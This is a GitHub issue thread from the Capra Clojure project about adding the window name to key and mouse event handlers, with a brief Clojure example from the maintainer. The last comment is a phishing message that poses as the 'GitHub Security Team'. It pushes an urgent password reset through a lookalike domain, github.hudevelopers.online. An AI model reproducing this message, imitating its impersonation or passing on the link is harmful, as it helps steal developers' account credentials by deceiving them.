### ISSUE TITLE
Add Canvas Name to Key and Mouse Events (Multi-Window Support)

### ISSUE THREAD

**Issue by MikeHardIce** [MikeHardIce/Capra#4]
Add the canvas name to the multi method calls for mouse and key events. This would allow the use of multiple windows.

**Comment by MikeHardIce** [comment]
The window name is added to the even functions when multiple windows were introduced (0.0.4+)

Example:

```Clojure

(defmethod handle-event :window-hidden [_ {:keys [window-name]}]
  (println "window hidden " window-name))
```

**Comment by fekusatech** [comment]
# Urgent: Security Alert for MikeHardIce

Hello,

We've detected unusual activity in your GitHub repository. To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
